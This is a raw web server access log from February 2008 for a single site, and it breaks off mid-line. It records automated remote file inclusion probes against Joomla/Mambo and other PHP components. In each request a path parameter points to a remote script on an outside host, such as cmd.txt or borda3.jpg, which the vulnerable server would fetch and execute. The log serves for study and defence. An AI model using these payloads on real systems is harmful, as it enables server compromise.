64.38.24.138 - - [03/Feb/2008:20:05:34 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:20:06:22 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:20:06:22 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:20:06:22 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.77.184.236 - - [03/Feb/2008:20:08:21 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.pixeloutlet.com/cart/templates_c/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:20:08:38 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:20:08:38 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:20:09:34 -0800] "GET /logs/access_071203.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:20:11:09 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:20:11:09 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [03/Feb/2008:20:11:09 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.149.101.49 - - [03/Feb/2008:20:11:41 -0800] "GET //skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.149.101.49 - - [03/Feb/2008:20:11:41 -0800] "GET //skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.67.21.65 - - [03/Feb/2008:20:12:02 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:20:12:13 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:20:12:13 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:20:12:13 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:20:12:45 -0800] "GET /vwar//convert/mvcw.php?step=1&vwar_root=http://findonline.bravehost.com/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:20:12:46 -0800] "GET /logs/vwar//convert/mvcw.php?step=1&vwar_root=http://findonline.bravehost.com/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:20:15:01 -0800] "GET /logs/access_071203.log/components/com_performs/performs.php?mosConfig_absolute_path=http://aneuk.com/cmd.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.149.101.49 - - [03/Feb/2008:20:17:05 -0800] "GET /index.php3?p=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.149.101.49 - - [03/Feb/2008:20:17:05 -0800] "GET /index.php3?p=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.1.31.63 - - [03/Feb/2008:20:17:54 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
210.1.31.63 - - [03/Feb/2008:20:17:55 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
210.1.31.63 - - [03/Feb/2008:20:17:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.218.149.119 - - [03/Feb/2008:20:18:17 -0800] "GET /logs/access_071231.log//templates/headline_temp.php?nst_inc=http://xamuja.freehostia.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
211.218.149.119 - - [03/Feb/2008:20:18:17 -0800] "GET /logs//templates/headline_temp.php?nst_inc=http://xamuja.freehostia.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:20:19:24 -0800] "GET /logs/access_071231.log/modules/My_eGallery/index.php?basepath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
211.218.149.119 - - [03/Feb/2008:20:19:41 -0800] "GET /logs/access.log//templates/headline_temp.php?nst_inc=http://xamuja.freehostia.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
62.193.224.20 - - [03/Feb/2008:20:21:17 -0800] "GET /logs/access_080114.log/config.i